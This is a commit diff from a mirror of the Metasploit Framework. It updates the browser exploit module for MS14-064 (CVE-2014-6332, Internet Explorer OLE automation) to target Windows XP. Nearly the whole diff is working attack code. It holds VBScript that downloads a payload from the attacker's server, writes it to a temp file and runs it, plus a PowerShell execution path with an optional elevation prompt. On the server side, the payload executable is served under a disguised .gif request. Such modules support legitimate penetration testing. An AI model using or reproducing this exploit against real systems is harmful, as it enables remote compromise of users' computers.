infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Update MS14-064 for Windows XP

bug/bundler_fix
sinn3r 2015-02-23 23:08:13 -06:00
parent 1b7e819106
commit 578a545b22
1 changed files with 105 additions and 22 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

127
modules/exploits/windows/browser/ms14_064_ole_code_execution.rb
View File

@ -11,6 +11,7 @@ class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::BrowserExploitServer
include Msf::Exploit::EXE
include Msf::Exploit::Powershell
def initialize(info={})
@ -18,10 +19,13 @@ class Metasploit4 < Msf::Exploit::Remote
'Name' => "Microsoft Internet Explorer Windows OLE Automation Array Remote Code Execution",
'Description' => %q{
This module exploits the Windows OLE Automation array vulnerability, CVE-2014-6332.
The vulnerability affects Internet Explorer 3.0 until version 11 within Windows95 up to Windows 10.
For this module to be successful, powershell is required on the target machine. On
Internet Explorer versions using Protected Mode, the user has to manually allow
powershell.exe to execute in order to be compromised.
The vulnerability affects Internet Explorer 3.0 until version 11 within Windows 95 up to
Windows 10, and there is no patch for Windows XP or older.
Windows XP by defaults supports VBS, therefore it is used as the attack vector. On other
Windows systems, the exploit will try using Powershell instead. If Protected Mode is
enabled, the user has to manually allow powershell.exe to execute in order to be
compromised.
},
'License' => MSF_LICENSE,
'Author' =>
@ -32,6 +36,7 @@ class Metasploit4 < Msf::Exploit::Remote
'Wesley Neelen', # security[at]forsec.nl
'GradiusX <francescomifsud[at]gmail.com>',
'b33f', # @FuzzySec
'sinn3r'
],
'References' =>
[
@ -46,14 +51,24 @@ class Metasploit4 < Msf::Exploit::Remote
'Platform' => 'win',
'Targets' =>
[
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[
'Windows XP',
{
'os_name' => OperatingSystems::Match::WINDOWS_XP
}
],
[
'Other Windows x86',
{
'os_name' => OperatingSystems::Match::WINDOWS,
}
]
],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:ua_name => HttpClients::IE,
:os_name => /win/i,
:arch => 'x86',
:arch => ARCH_X86,
:ua_ver => lambda { |ver| ver.to_i.between?(4, 10) }
},
'DefaultOptions' =>
@ -260,20 +275,18 @@ end function
end
def get_html()
def vbs_vector(prep)
vbs_name = "#{Rex::Text.rand_text_alpha(rand(16)+4)}.vbs"
gif_name = "#{Rex::Text.rand_text_alpha(rand(5)+3)}.gif"
if datastore['TRYUAC']
tryuac = 'runas'
else
tryuac = 'open'
end
payload_src = (datastore['SSL'] ? 'https' : 'http')
payload_src << '://'
payload_src << (datastore['SRVHOST'] == '0.0.0.0' ? Rex::Socket.source_address : datastore['SRVHOST'])
payload_src << ":#{datastore['SRVPORT']}#{get_module_resource}/#{gif_name}"
payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })
payl.slice! "powershell.exe "
prep = vbs_prepare()
html = %Q|
<!doctype html>
# I tried to use ADODB.Stream to save my downloaded executable, but I was hitting an issue
# with it, so I ended up with Scripting.FileSystemObject. Not so bad I guess.
%Q|<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
@ -282,8 +295,19 @@ end function
function runaaaa()
On Error Resume Next
set xmlhttp = CreateObject("Microsoft.XMLHTTP")
xmlhttp.open "GET", "#{payload_src}", False
xmlhttp.send
Set objFSO=CreateObject("Scripting.FileSystemObject")
folder = objFSO.GetSpecialFolder(2)
scriptName = folder + "\\#{vbs_name}"
Set objFile = objFSO.CreateTextFile(scriptName,True)
objFile.Write xmlhttp.responseText
objFile.Close
set shell=createobject("Shell.Application")
shell.ShellExecute "powershell.exe", "#{payl}", "", "#{tryuac}", 0
shell.ShellExecute "wscript.exe", scriptName, "", "open", 0
end function
</script>
@ -293,12 +317,71 @@ end function
</body>
</html>
|
end
def powershell_vector(prep)
if datastore['TRYUAC']
tryuac = 'runas'
else
tryuac = 'open'
end
# Powershell was the first technique demonstrated publicly.
# On some Windows setups such as Windows 7 + IE 8, this works quite well.
# But you will get a prompt for IE9 or newer.
payl = cmd_psh_payload(payload.encoded,"x86",{ :remove_comspec => true })
payl.slice! "powershell.exe "
%Q|<!doctype html>
<html>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<body>
<script language="VBScript">
function runaaaa()
On Error Resume Next
set shell=createobject("Shell.Application")
shell.ShellExecute "powershell.exe", "#{payl}", "", "#{tryuac}", 0
end function
</script>
<script language="VBScript">
#{prep}
</script>
</body>
</html>
|
end
def get_html
prep = vbs_prepare()
case get_target.name
when OperatingSystems::Match::WINDOWS_XP
return vbs_vector(prep)
else
return powershell_vector(prep)
end
end
def on_request_exploit(cli, request, target_info)
print_status("Requesting: #{request.uri}")
send_exploit_html(cli, get_html())
case request.uri
when /\.gif/
if get_target.name =~ OperatingSystems::Match::WINDOWS_XP
p = regenerate_payload(cli)
data = generate_payload_exe({:code => p.encoded})
# The default template uses \n, and wscript.exe isn't very happy about that.
# It should be \r\n .
vbs = Msf::Util::EXE.to_exe_vbs(data).gsub(/\x0a/, "\r\n")
send_response(cli, vbs)
else
# The VBS technique is only for Windows XP. So if a non-XP system is requesting it,
# something is not right.
send_not_found(cli)
end
else
send_exploit_html(cli, get_html)
end
end
end